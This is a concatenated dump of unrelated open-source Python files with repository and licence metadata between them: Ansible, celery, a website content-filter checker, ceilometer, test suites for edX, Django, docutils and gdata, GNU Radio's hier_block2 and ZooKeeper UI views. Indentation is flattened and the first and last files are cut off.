if rc != 0:
if stderr:
module.fail_json(msg=stderr, rc=rc)
else:
module.fail_json(msg=stdout, rc=rc)
result['changed'] = changed
result['rc'] = rc
module.exit_json(**result)
# import module snippets
from ansible.module_utils.basic import *
main()
|
gpl-3.0
|
waseem18/oh-mainline
|
vendor/packages/celery/celery/concurrency/eventlet.py
|
18
|
3457
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import sys
from time import time
if not os.environ.get("EVENTLET_NOPATCH"):
import eventlet
import eventlet.debug
eventlet.monkey_patch()
eventlet.debug.hub_prevent_multiple_readers(False)
from .. import signals
from ..utils import timer2
from . import base
def apply_target(target, args=(), kwargs={}, callback=None,
accept_callback=None, getpid=None):
return base.apply_target(target, args, kwargs, callback, accept_callback,
pid=getpid())
class Schedule(timer2.Schedule):
def __init__(self, *args, **kwargs):
from eventlet.greenthread import spawn_after
from greenlet import GreenletExit
super(Schedule, self).__init__(*args, **kwargs)
self.GreenletExit = GreenletExit
self._spawn_after = spawn_after
self._queue = set()
def enter(self, entry, eta=None, priority=0):
try:
eta = timer2.to_timestamp(eta)
except OverflowError:
if not self.handle_error(sys.exc_info()):
raise
now = time()
if eta is None:
eta = now
secs = max(eta - now, 0)
g = self._spawn_after(secs, entry)
self._queue.add(g)
g.link(self._entry_exit, entry)
g.entry = entry
g.eta = eta
g.priority = priority
g.cancelled = False
return g
def _entry_exit(self, g, entry):
try:
try:
g.wait()
except self.GreenletExit:
entry.cancel()
g.cancelled = True
finally:
self._queue.discard(g)
def clear(self):
queue = self._queue
while queue:
try:
queue.pop().cancel()
except (KeyError, self.GreenletExit):
pass
@property
def queue(self):
return [(g.eta, g.priority, g.entry) for g in self._queue]
class Timer(timer2.Timer):
Schedule = Schedule
def ensure_started(self):
pass
def stop(self):
self.schedule.clear()
def cancel(self, tref):
try:
tref.cancel()
except self.schedule.GreenletExit:
pass
def start(self):
pass
class TaskPool(base.BasePool):
Timer = Timer
signal_safe = False
is_green = True
def __init__(self, *args, **kwargs):
from eventlet import greenthread
from eventlet.greenpool import GreenPool
self.Pool = GreenPool
self.getcurrent = greenthread.getcurrent
self.spawn_n = greenthread.spawn_n
super(TaskPool, self).__init__(*args, **kwargs)
def on_start(self):
self._pool = self.Pool(self.limit)
signals.eventlet_pool_started.send(sender=self)
def on_stop(self):
signals.eventlet_pool_preshutdown.send(sender=self)
if self._pool is not None:
self._pool.waitall()
signals.eventlet_pool_postshutdown.send(sender=self)
def on_apply(self, target, args=None, kwargs=None, callback=None,
accept_callback=None, **_):
signals.eventlet_pool_apply.send(sender=self,
target=target, args=args, kwargs=kwargs)
self._pool.spawn_n(apply_target, target, args, kwargs,
callback, accept_callback,
self.getcurrent)
|
agpl-3.0
|
Dark-Passenger/Top_websites_content_filtering_test
|
website_access_single_user_no_report.py
|
1
|
2327
|
from __future__ import print_function, division
from requests import get
from lxml.html import fromstring
from datetime import datetime
from requests.exceptions import ConnectionError
from csv import reader
from itertools import islice
from os import system, name
filename = "top-1m.csv"
websites = reader(open(filename))
proxy = {
'http':'10.11.11.1:3128',
'https':'10.11.11.1:3128'
}
#setup counters
website_counter = 0
blocked_counter = 0
not_blocked_counter = 0
error_counter = 0
response_time = []
def Stats():
if name == 'nt':
system('cls')
else:
system('clear')
end_time = datetime.now().replace(microsecond=0)
duration = end_time - start_time
    # Guard against a division by zero when every request so far has failed.
    avg_response_time = sum(response_time)/len(response_time) if response_time else 0
print("\n\t\t--Statistics--\n")
print("Total running time :\t\t", duration)
print("Total websites accessed :\t", website_counter)
print("Total websites blocked :\t", blocked_counter)
print("Total websites not blocked :\t", not_blocked_counter)
print("Totol websites closed with error :\t",error_counter)
print("Average Response time :\t",avg_response_time)
start_row = int(input("Starting row number: "))
end_row = int(input("Ending row number: "))
#Start calculating program running time
start_time = datetime.now().replace(microsecond=0)
for website in islice(websites, start_row, end_row):
website_name = "http://"+website[1]
website_counter = website_counter+1
try :
webpage = get(website_name, proxies=proxy)
site_map = fromstring(webpage.content)
response_time.append(webpage.elapsed.microseconds)
try:
#Site blocked
result = site_map.xpath('//*[@id="content"]/div[2]/div/div[2]/div[1]/h1/label//text()')[0]
site = site_map.xpath('//*[@id="content"]/div[2]/div/div[2]/div[1]/div/strong/text()[1]')[0]
category = site_map.xpath('//*[@id="content"]/div[2]/div/div[2]/div[1]/div/strong/text()')[1]
blocked_counter=blocked_counter + 1
except IndexError as e:
#Oops site not blocked
not_blocked_counter = not_blocked_counter + 1
except ConnectionError :
#connection error
error_counter = error_counter + 1
if website_counter % 10 == 0:
Stats()
Stats()
|
gpl-3.0
|
maestro-hybrid-cloud/ceilometer
|
ceilometer/alarm/evaluator/__init__.py
|
5
|
4879
|
#
# Copyright 2013 eNovance <licensing@enovance.com>
#
# Authors: Mehdi Abaakouk <mehdi.abaakouk@enovance.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import datetime
from ceilometerclient import client as ceiloclient
import croniter
from oslo_config import cfg
from oslo_log import log
from oslo_utils import timeutils
import pytz
import six
from ceilometer.i18n import _, _LI
LOG = log.getLogger(__name__)
UNKNOWN = 'insufficient data'
OK = 'ok'
ALARM = 'alarm'
cfg.CONF.import_opt('http_timeout', 'ceilometer.service')
cfg.CONF.import_group('service_credentials', 'ceilometer.service')
@six.add_metaclass(abc.ABCMeta)
class Evaluator(object):
"""Base class for alarm rule evaluator plugins."""
def __init__(self, notifier):
self.notifier = notifier
self.api_client = None
@property
def _client(self):
"""Construct or reuse an authenticated API client."""
if not self.api_client:
auth_config = cfg.CONF.service_credentials
creds = dict(
os_auth_url=auth_config.os_auth_url,
os_region_name=auth_config.os_region_name,
os_tenant_name=auth_config.os_tenant_name,
os_password=auth_config.os_password,
os_username=auth_config.os_username,
os_cacert=auth_config.os_cacert,
os_endpoint_type=auth_config.os_endpoint_type,
insecure=auth_config.insecure,
timeout=cfg.CONF.http_timeout,
)
self.api_client = ceiloclient.get_client(2, **creds)
return self.api_client
def _refresh(self, alarm, state, reason, reason_data):
"""Refresh alarm state."""
try:
previous = alarm.state
if previous != state:
LOG.info(_LI('alarm %(id)s transitioning to %(state)s because '
'%(reason)s') % {'id': alarm.alarm_id,
'state': state,
'reason': reason})
self._client.alarms.set_state(alarm.alarm_id, state=state)
alarm.state = state
if self.notifier:
self.notifier.notify(alarm, previous, reason, reason_data)
except Exception:
# retry will occur naturally on the next evaluation
# cycle (unless alarm state reverts in the meantime)
LOG.exception(_('alarm state update failed'))
@classmethod
def within_time_constraint(cls, alarm):
"""Check whether the alarm is within at least one of its time limits.
If there are none, then the answer is yes.
"""
if not alarm.time_constraints:
return True
now_utc = timeutils.utcnow().replace(tzinfo=pytz.utc)
for tc in alarm.time_constraints:
tz = pytz.timezone(tc['timezone']) if tc['timezone'] else None
now_tz = now_utc.astimezone(tz) if tz else now_utc
start_cron = croniter.croniter(tc['start'], now_tz)
if cls._is_exact_match(start_cron, now_tz):
return True
# start_cron.cur has changed in _is_exact_match(),
# croniter cannot recover properly in some corner case.
start_cron = croniter.croniter(tc['start'], now_tz)
latest_start = start_cron.get_prev(datetime.datetime)
duration = datetime.timedelta(seconds=tc['duration'])
if latest_start <= now_tz <= latest_start + duration:
return True
return False
@staticmethod
def _is_exact_match(cron, ts):
"""Handle edge in case when both parameters are equal.
Handle edge case where if the timestamp is the same as the
cron point in time to the minute, croniter returns the previous
start, not the current. We can check this by first going one
step back and then one step forward and check if we are
at the original point in time.
"""
cron.get_prev()
diff = timeutils.total_seconds(ts - cron.get_next(datetime.datetime))
return abs(diff) < 60 # minute precision
@abc.abstractmethod
def evaluate(self, alarm):
"""Interface definition.
Evaluate an alarm.
:param alarm: an instance of the Alarm to evaluate
"""
|
apache-2.0
|
jazkarta/edx-platform
|
common/lib/xmodule/xmodule/tests/test_import_static.py
|
208
|
1949
|
"""
Tests that check that we ignore the appropriate files when importing courses.
"""
import unittest
from mock import Mock
from xmodule.modulestore.xml_importer import import_static_content
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from xmodule.tests import DATA_DIR
class IgnoredFilesTestCase(unittest.TestCase):
"Tests for ignored files"
def test_ignore_tilde_static_files(self):
course_dir = DATA_DIR / "tilde"
course_id = SlashSeparatedCourseKey("edX", "tilde", "Fall_2012")
content_store = Mock()
content_store.generate_thumbnail.return_value = ("content", "location")
import_static_content(course_dir, content_store, course_id)
saved_static_content = [call[0][0] for call in content_store.save.call_args_list]
name_val = {sc.name: sc.data for sc in saved_static_content}
self.assertIn("example.txt", name_val)
self.assertNotIn("example.txt~", name_val)
self.assertIn("GREEN", name_val["example.txt"])
def test_ignore_dot_underscore_static_files(self):
"""
Test for ignored Mac OS metadata files (filename starts with "._")
"""
course_dir = DATA_DIR / "dot-underscore"
course_id = SlashSeparatedCourseKey("edX", "dot-underscore", "2014_Fall")
content_store = Mock()
content_store.generate_thumbnail.return_value = ("content", "location")
import_static_content(course_dir, content_store, course_id)
saved_static_content = [call[0][0] for call in content_store.save.call_args_list]
name_val = {sc.name: sc.data for sc in saved_static_content}
self.assertIn("example.txt", name_val)
self.assertIn(".example.txt", name_val)
self.assertNotIn("._example.txt", name_val)
self.assertNotIn(".DS_Store", name_val)
self.assertIn("GREEN", name_val["example.txt"])
self.assertIn("BLUE", name_val[".example.txt"])
|
agpl-3.0
|
chyeh727/django
|
tests/template_tests/filter_tests/test_escape.py
|
324
|
1495
|
from django.template.defaultfilters import escape
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class EscapeTests(SimpleTestCase):
"""
The "escape" filter works the same whether autoescape is on or off,
but it has no effect on strings already marked as safe.
"""
@setup({'escape01': '{{ a|escape }} {{ b|escape }}'})
def test_escape01(self):
output = self.engine.render_to_string('escape01', {"a": "x&y", "b": mark_safe("x&y")})
self.assertEqual(output, "x&y x&y")
@setup({'escape02': '{% autoescape off %}{{ a|escape }} {{ b|escape }}{% endautoescape %}'})
def test_escape02(self):
output = self.engine.render_to_string('escape02', {"a": "x&y", "b": mark_safe("x&y")})
self.assertEqual(output, "x&y x&y")
# It is only applied once, regardless of the number of times it
# appears in a chain.
@setup({'escape03': '{% autoescape off %}{{ a|escape|escape }}{% endautoescape %}'})
def test_escape03(self):
output = self.engine.render_to_string('escape03', {"a": "x&y"})
self.assertEqual(output, "x&y")
@setup({'escape04': '{{ a|escape|escape }}'})
def test_escape04(self):
output = self.engine.render_to_string('escape04', {"a": "x&y"})
self.assertEqual(output, "x&y")
class FunctionTests(SimpleTestCase):
def test_non_string_input(self):
self.assertEqual(escape(123), '123')
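# Rough illustration of the escaping behaviour exercised above (sketch only,
# using django.utils.html.escape rather than the template filter):
#
#   from django.utils.html import escape
#   escape("x&y")      # -> 'x&amp;y'
#   escape("x&amp;y")  # -> 'x&amp;amp;y' (plain escape() is not idempotent;
#                      #    the |escape filter applies escaping only once)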
|
bsd-3-clause
|
SnappleCap/oh-mainline
|
vendor/packages/docutils/test/test_parsers/test_rst/test_TableParser.py
|
18
|
6100
|
#! /usr/bin/env python
# coding: utf-8
# $Id: test_TableParser.py 7668 2013-06-04 12:46:30Z milde $
# Author: David Goodger <goodger@python.org>
# Copyright: This module has been placed in the public domain.
"""
Tests for states.py.
"""
from __init__ import DocutilsTestSupport
def suite():
s = DocutilsTestSupport.GridTableParserTestSuite()
s.generateTests(totest)
return s
totest = {}
totest['grid_tables'] = [
["""\
+-------------------------------------+
| A table with one cell and one line. |
+-------------------------------------+
""",
[(0, 0, 2, 38, ['A table with one cell and one line.'])],
([37],
[],
[[(0, 0, 1, ['A table with one cell and one line.'])]])],
["""\
+--------------+--------------+
| A table with | two columns. |
+--------------+--------------+
""",
[(0, 0, 2, 15, ['A table with']),
(0, 15, 2, 30, ['two columns.'])],
([14, 14],
[],
[[(0, 0, 1, ['A table with']),
(0, 0, 1, ['two columns.'])]])],
# Combining chars in grid tables still fail
# [u"""\
# +--------------+------------------+
# | A taฬble wฬith | combฬฒining chars. |
# +--------------+------------------+
# """,
# [(0, 0, 2, 15, [u'A table with']),
# (0, 15, 2, 30, [u'combining chars.'])],
# ([14, 14],
# [],
# [[(0, 0, 1, [u'A table with']),
# (0, 0, 1, [u'combining chars.'])]])],
["""\
+--------------+-------------+
| A table with | two columns |
+--------------+-------------+
| and | two rows. |
+--------------+-------------+
""",
[(0, 0, 2, 15, ['A table with']),
(0, 15, 2, 29, ['two columns']),
(2, 0, 4, 15, ['and']),
(2, 15, 4, 29, ['two rows.'])],
([14, 13],
[],
[[(0, 0, 1, ['A table with']),
(0, 0, 1, ['two columns'])],
[(0, 0, 3, ['and']),
(0, 0, 3, ['two rows.'])]])],
["""\
+--------------------------+
| A table with three rows, |
+------------+-------------+
| and two | columns. |
+------------+-------------+
| First and last rows |
| contain column spans. |
+--------------------------+
""",
[(0, 0, 2, 27, ['A table with three rows,']),
(2, 0, 4, 13, ['and two']),
(2, 13, 4, 27, ['columns.']),
(4, 0, 7, 27, ['First and last rows', 'contain column spans.'])],
([12, 13],
[],
[[(0, 1, 1, ['A table with three rows,']),
None],
[(0, 0, 3, ['and two']),
(0, 0, 3, ['columns.'])],
[(0, 1, 5, ['First and last rows', 'contain column spans.']),
None]])],
["""\
+------------+-------------+---------------+
| A table | two rows in | and row spans |
| with three +-------------+ to left and |
| columns, | the middle, | right. |
+------------+-------------+---------------+
""",
[(0, 0, 4, 13, ['A table', 'with three', 'columns,']),
(0, 13, 2, 27, ['two rows in']),
(0, 27, 4, 43, ['and row spans', 'to left and', 'right.']),
(2, 13, 4, 27, ['the middle,'])],
([12, 13, 15],
[],
[[(1, 0, 1, ['A table', 'with three', 'columns,']),
(0, 0, 1, ['two rows in']),
(1, 0, 1, ['and row spans', 'to left and', 'right.'])],
[None,
(0, 0, 3, ['the middle,']),
None]])],
["""\
+------------+-------------+---------------+
| A table | | two rows in | and funny |
| with 3 +--+-------------+-+ stuff. |
| columns, | the middle, | | |
+------------+-------------+---------------+
""",
[(0, 0, 4, 13, ['A table |', 'with 3 +--', 'columns,']),
(0, 13, 2, 27, ['two rows in']),
(0, 27, 4, 43, [' and funny', '-+ stuff.', ' |']),
(2, 13, 4, 27, ['the middle,'])],
([12, 13, 15],
[],
[[(1, 0, 1, ['A table |', 'with 3 +--', 'columns,']),
(0, 0, 1, ['two rows in']),
(1, 0, 1, [' and funny', '-+ stuff.', ' |'])],
[None,
(0, 0, 3, ['the middle,']),
None]])],
["""\
+-----------+-------------------------+
| W/NW cell | N/NE cell |
| +-------------+-----------+
| | Middle cell | E/SE cell |
+-----------+-------------+ |
| S/SE cell | |
+-------------------------+-----------+
""",
[(0, 0, 4, 12, ['W/NW cell', '', '']),
(0, 12, 2, 38, ['N/NE cell']),
(2, 12, 4, 26, ['Middle cell']),
(2, 26, 6, 38, ['E/SE cell', '', '']),
(4, 0, 6, 26, ['S/SE cell'])],
([11, 13, 11],
[],
[[(1, 0, 1, ['W/NW cell', '', '']),
(0, 1, 1, ['N/NE cell']),
None],
[None,
(0, 0, 3, ['Middle cell']),
(1, 0, 3, ['E/SE cell', '', ''])],
[(0, 1, 5, ['S/SE cell']),
None,
None]])],
["""\
+--------------+-------------+
| A bad table. | |
+--------------+ |
| Cells must be rectangles. |
+----------------------------+
""",
'TableMarkupError: Malformed table; parse incomplete.',
'TableMarkupError: Malformed table; parse incomplete.'],
["""\
+-------------------------------+
| A table with two header rows, |
+------------+------------------+
| the first | with a span. |
+============+==================+
| Two body | rows, |
+------------+------------------+
| the second with a span. |
+-------------------------------+
""",
[(0, 0, 2, 32, ['A table with two header rows,']),
(2, 0, 4, 13, ['the first']),
(2, 13, 4, 32, ['with a span.']),
(4, 0, 6, 13, ['Two body']),
(4, 13, 6, 32, ['rows,']),
(6, 0, 8, 32, ['the second with a span.'])],
([12, 18],
[[(0, 1, 1, ['A table with two header rows,']),
None],
[(0, 0, 3, ['the first']),
(0, 0, 3, ['with a span.'])]],
[[(0, 0, 5, ['Two body']),
(0, 0, 5, ['rows,'])],
[(0, 1, 7, ['the second with a span.']),
None]])],
["""\
+-------------------------------+
| A table with two head/body |
+=============+=================+
| row | separators. |
+=============+=================+
| That's bad. | |
+-------------+-----------------+
""",
'TableMarkupError: Multiple head/body row separators '
'(table lines 3 and 5); only one allowed.',
'TableMarkupError: Multiple head/body row separators '
'(table lines 3 and 5); only one allowed.'],
["""\
+-------------------------------------+
| |
+-------------------------------------+
""",
[(0, 0, 2, 38, [''])],
([37],
[],
[[(0, 0, 1, [''])]])],
]
if __name__ == '__main__':
import unittest
unittest.main(defaultTest='suite')
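# Quick interactive check (illustrative, outside the test suite): the grid
# table parser can be driven directly and returns (colspecs, head, body)
# structures in the same shape as the expected values above:
#
#   from docutils.parsers.rst.tableparser import GridTableParser
#   from docutils.statemachine import StringList
#   block = StringList(["+-----+", "| Hi. |", "+-----+"])
#   print(GridTableParser().parse(block))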
|
agpl-3.0
|
simonpatrick/bite-project
|
deps/gdata-python-client/tests/gdata_tests/apps/organization/live_client_test.py
|
22
|
5786
|
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Live client tests for the Organization Unit Provisioning API."""
# This module is used for version 2 of the Google Data APIs.
# These tests attempt to connect to Google servers.
__author__ = 'Gunjan Sharma <gunjansharma@google.com>'
import random
import unittest
import gdata.apps.organization.client
import gdata.apps.organization.data
import gdata.client
import gdata.data
import gdata.gauth
import gdata.test_config as conf
conf.options.register_option(conf.APPS_DOMAIN_OPTION)
class OrganizationUnitProvisioningClientTest(unittest.TestCase):
def setUp(self):
self.client = gdata.apps.organization.client.OrganizationUnitProvisioningClient(
domain='example.com')
if conf.options.get_value('runlive') == 'true':
self.client = gdata.apps.organization.client.OrganizationUnitProvisioningClient(
domain=conf.options.get_value('appsdomain'))
if conf.options.get_value('ssl') == 'true':
self.client.ssl = True
conf.configure_client(self.client,
'OrganizationUnitProvisioningClientTest',
self.client.auth_service, True)
def tearDown(self):
conf.close_client(self.client)
def testClientConfiguration(self):
self.assertEqual('apps-apis.google.com', self.client.host)
self.assertEqual('2.0', self.client.api_version)
self.assertEqual('apps', self.client.auth_service)
self.assertEqual(
('https://apps-apis.google.com/a/feeds/user/',
'https://apps-apis.google.com/a/feeds/policies/',
'https://apps-apis.google.com/a/feeds/alias/',
'https://apps-apis.google.com/a/feeds/groups/'),
self.client.auth_scopes)
if conf.options.get_value('runlive') == 'true':
self.assertEqual(self.client.domain,
conf.options.get_value('appsdomain'))
else:
self.assertEqual(self.client.domain, 'example.com')
def testMakeCustomerIdFeedUri(self):
self.assertEqual('/a/feeds/customer/2.0/customerId',
self.client.MakeCustomerIdFeedUri())
def testMakeOrganizationUnitOrgunitProvisioningUri(self):
self.customer_id = 'tempo'
self.assertEqual('/a/feeds/orgunit/2.0/%s' % self.customer_id,
self.client.MakeOrganizationUnitOrgunitProvisioningUri(
self.customer_id))
self.assertEqual(
'/a/feeds/orgunit/2.0/%s/testing/Test+Test' % self.customer_id,
self.client.MakeOrganizationUnitOrgunitProvisioningUri(
self.customer_id, org_unit_path='testing/Test+Test'))
self.assertEqual(
'/a/feeds/orgunit/2.0/%s?get=all' % (self.customer_id),
self.client.MakeOrganizationUnitOrgunitProvisioningUri(
self.customer_id, params={'get': 'all'}))
def testMakeOrganizationUnitOrguserProvisioningUri(self):
self.customer_id = 'tempo'
self.assertEqual('/a/feeds/orguser/2.0/%s' % self.customer_id,
self.client.MakeOrganizationUnitOrguserProvisioningUri(
self.customer_id))
self.assertEqual(
'/a/feeds/orguser/2.0/%s/admin@example.com' % self.customer_id,
self.client.MakeOrganizationUnitOrguserProvisioningUri(
self.customer_id, org_user_email='admin@example.com'))
self.assertEqual(
'/a/feeds/orguser/2.0/%s?get=all' % (self.customer_id),
self.client.MakeOrganizationUnitOrguserProvisioningUri(
self.customer_id, params={'get': 'all'}))
def testCreateRetrieveUpdateDelete(self):
if not conf.options.get_value('runlive') == 'true':
return
# Either load the recording or prepare to make a live request.
conf.configure_cache(self.client, 'testCreateRetrieveUpdateDelete')
customer_id = self.client.RetrieveCustomerId().GetCustomerId()
rnd_number = random.randrange(0, 100001)
org_unit_name = 'test_org_unit_name%s' % (rnd_number)
org_unit_description = 'test_org_unit_description%s' % (rnd_number)
org_unit_path = org_unit_name
new_entry = self.client.CreateOrgUnit(customer_id, org_unit_name,
parent_org_unit_path='/',
description=org_unit_description,
block_inheritance=False)
self.assert_(isinstance(new_entry,
gdata.apps.organization.data.OrgUnitEntry))
self.assertEquals(new_entry.org_unit_path, org_unit_path)
entry = self.client.RetrieveOrgUnit(customer_id, org_unit_path)
self.assert_(isinstance(entry,
gdata.apps.organization.data.OrgUnitEntry))
self.assertEquals(entry.org_unit_name, org_unit_name)
self.assertEquals(entry.org_unit_description, org_unit_description)
self.assertEquals(entry.parent_org_unit_path, '')
self.assertEquals(entry.org_unit_path, org_unit_path)
self.assertEquals(entry.org_unit_block_inheritance, 'false')
self.client.DeleteOrgUnit(customer_id, org_unit_name)
def suite():
return conf.build_suite([OrganizationUnitProvisioningClientTest])
if __name__ == '__main__':
unittest.TextTestRunner().run(suite())
|
apache-2.0
|
jarn0ld/gnuradio
|
gnuradio-runtime/python/gnuradio/gr/hier_block2.py
|
34
|
5656
|
#
# Copyright 2006,2007,2014 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import functools
from runtime_swig import hier_block2_swig, dot_graph
import pmt
def _multiple_endpoints(func):
@functools.wraps(func)
def wrapped(self, *points):
if not points:
raise ValueError("At least one block required for " + func.__name__)
elif len(points) == 1:
try:
block = points[0].to_basic_block()
except AttributeError:
raise ValueError("At least two endpoints required for " + func.__name__)
func(self, block)
else:
try:
endp = [(p.to_basic_block(), 0) if hasattr(p, 'to_basic_block')
else (p[0].to_basic_block(), p[1]) for p in points]
except (ValueError, TypeError, AttributeError) as err:
raise ValueError("Unable to coerce endpoints: " + str(err))
for (src, src_port), (dst, dst_port) in zip(endp, endp[1:]):
func(self, src, src_port, dst, dst_port)
return wrapped
def _optional_endpoints(func):
@functools.wraps(func)
def wrapped(self, src, srcport, dst=None, dstport=None):
if dst is None and dstport is None:
try:
(src, srcport), (dst, dstport) = src, srcport
except (ValueError, TypeError) as err:
raise ValueError("Unable to coerce endpoints: " + str(err))
func(self, src.to_basic_block(), srcport, dst.to_basic_block(), dstport)
return wrapped
# This makes a 'has-a' relationship to look like an 'is-a' one.
#
# It allows Python classes to subclass this one, while passing through
# method calls to the C++ class shared pointer from SWIG.
#
# It also allows us to intercept method calls if needed
#
class hier_block2(object):
"""
Subclass this to create a python hierarchical block.
This is a python wrapper around the C++ hierarchical block implementation.
Provides convenience functions and allows proper Python subclassing.
"""
def __init__(self, name, input_signature, output_signature):
"""
Create a hierarchical block with a given name and I/O signatures.
"""
self._impl = hier_block2_swig(name, input_signature, output_signature)
def __getattr__(self, name):
"""
Pass-through member requests to the C++ object.
"""
if not hasattr(self, "_impl"):
raise RuntimeError(
"{0}: invalid state -- did you forget to call {0}.__init__ in "
"a derived class?".format(self.__class__.__name__))
return getattr(self._impl, name)
# FIXME: these should really be implemented
# in the original C++ class (gr_hier_block2), then they would all be inherited here
@_multiple_endpoints
def connect(self, *args):
"""
Connect two or more block endpoints. An endpoint is either a (block, port)
tuple or a block instance. In the latter case, the port number is assumed
to be zero.
To connect the hierarchical block external inputs or outputs to internal block
inputs or outputs, use 'self' in the connect call.
If multiple arguments are provided, connect will attempt to wire them in series,
interpreting the endpoints as inputs or outputs as appropriate.
"""
self.primitive_connect(*args)
@_multiple_endpoints
def disconnect(self, *args):
"""
Disconnect two or more endpoints in the flowgraph.
To disconnect the hierarchical block external inputs or outputs to internal block
inputs or outputs, use 'self' in the connect call.
If more than two arguments are provided, they are disconnected successively.
"""
self.primitive_disconnect(*args)
@_optional_endpoints
def msg_connect(self, *args):
"""
Connect two message ports in the flowgraph.
If only two arguments are provided, they must be endpoints (block, port)
"""
self.primitive_msg_connect(*args)
@_optional_endpoints
def msg_disconnect(self, *args):
"""
Disconnect two message ports in the flowgraph.
If only two arguments are provided, they must be endpoints (block, port)
"""
self.primitive_msg_disconnect(*args)
def message_port_register_hier_in(self, portname):
"""
Register a message port for this hier block
"""
self.primitive_message_port_register_hier_in(pmt.intern(portname))
def message_port_register_hier_out(self, portname):
"""
Register a message port for this hier block
"""
self.primitive_message_port_register_hier_out(pmt.intern(portname))
def dot_graph(self):
"""
Return graph representation in dot language
"""
return dot_graph(self._impl)
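# A minimal usage sketch (assumes a working GNU Radio install; the block names
# come from gnuradio.blocks). As the docstrings above describe, 'self' stands
# for the hier block's own external ports in connect() calls:
#
#   from gnuradio import gr, blocks
#
#   class squarer(gr.hier_block2):
#       def __init__(self):
#           gr.hier_block2.__init__(self, "squarer",
#                                   gr.io_signature(1, 1, gr.sizeof_float),
#                                   gr.io_signature(1, 1, gr.sizeof_float))
#           mult = blocks.multiply_ff()
#           self.connect(self, (mult, 0))
#           self.connect(self, (mult, 1))
#           self.connect(mult, self)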
|
gpl-3.0
|
jerry-sc/zookeeper-learning
|
src/contrib/huebrowser/zkui/src/zkui/views.py
|
114
|
4712
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from desktop.lib.django_util import render
from django.http import Http404
from zkui import settings
from zkui.stats import ZooKeeperStats
from zkui.rest import ZooKeeper
from zkui.utils import get_cluster_or_404
from zkui.forms import CreateZNodeForm, EditZNodeForm
def _get_global_overview():
overview = []
for c in settings.CLUSTERS:
overview.append(_get_overview(c))
return overview
def _get_overview(cluster):
stats = {}
for s in cluster['hostport'].split(','):
host, port = map(str.strip, s.split(':'))
zks = ZooKeeperStats(host, port)
stats[s] = zks.get_stats() or {}
cluster['stats'] = stats
return cluster
def _group_stats_by_role(cluster):
leader, followers = None, []
for host, stats in cluster['stats'].items():
stats['host'] = host
if stats.get('zk_server_state') == 'leader':
leader = stats
elif stats.get('zk_server_state') == 'follower':
followers.append(stats)
return leader, followers
def index(request):
overview = _get_global_overview()
return render('index.mako', request,
dict(overview=overview))
def view(request, id):
cluster = get_cluster_or_404(id)
cluster = _get_overview(cluster)
leader, followers = _group_stats_by_role(cluster)
return render('view.mako', request,
dict(cluster=cluster, leader=leader, followers=followers))
def clients(request, host):
parts = host.split(':')
if len(parts) != 2:
raise Http404
host, port = parts
zks = ZooKeeperStats(host, port)
clients = zks.get_clients()
return render('clients.mako', request,
dict(host=host, port=port, clients=clients))
def tree(request, id, path):
cluster = get_cluster_or_404(id)
zk = ZooKeeper(cluster['rest_gateway'])
znode = zk.get(path)
children = sorted(zk.get_children_paths(path))
return render('tree.mako', request,
dict(cluster=cluster, path=path, \
znode=znode, children=children))
def delete(request, id, path):
cluster = get_cluster_or_404(id)
if request.method == 'POST':
zk = ZooKeeper(cluster['rest_gateway'])
try:
zk.recursive_delete(path)
except ZooKeeper.NotFound:
pass
return tree(request, id, path[:path.rindex('/')] or '/')
def create(request, id, path):
cluster = get_cluster_or_404(id)
if request.method == 'POST':
form = CreateZNodeForm(request.POST)
if form.is_valid():
zk = ZooKeeper(cluster['rest_gateway'])
full_path = ("%s/%s" % (path, form.cleaned_data['name']))\
.replace('//', '/')
zk.create(full_path, \
form.cleaned_data['data'], \
sequence = form.cleaned_data['sequence'])
return tree(request, id, path)
else:
form = CreateZNodeForm()
return render('create.mako', request,
dict(path=path, form=form))
def edit_as_base64(request, id, path):
cluster = get_cluster_or_404(id)
zk = ZooKeeper(cluster['rest_gateway'])
node = zk.get(path)
if request.method == 'POST':
form = EditZNodeForm(request.POST)
if form.is_valid():
# TODO is valid base64 string?
data = form.cleaned_data['data'].decode('base64')
zk.set(path, data, form.cleaned_data['version'])
return tree(request, id, path)
else:
form = EditZNodeForm(dict(\
data=node.get('data64', ''),
version=node.get('version', '-1')))
return render('edit.mako', request,
dict(path=path, form=form))
def edit_as_text(request, id, path):
cluster = get_cluster_or_404(id)
zk = ZooKeeper(cluster['rest_gateway'])
node = zk.get(path)
if request.method == 'POST':
form = EditZNodeForm(request.POST)
if form.is_valid():
zk.set(path, form.cleaned_data['data'])
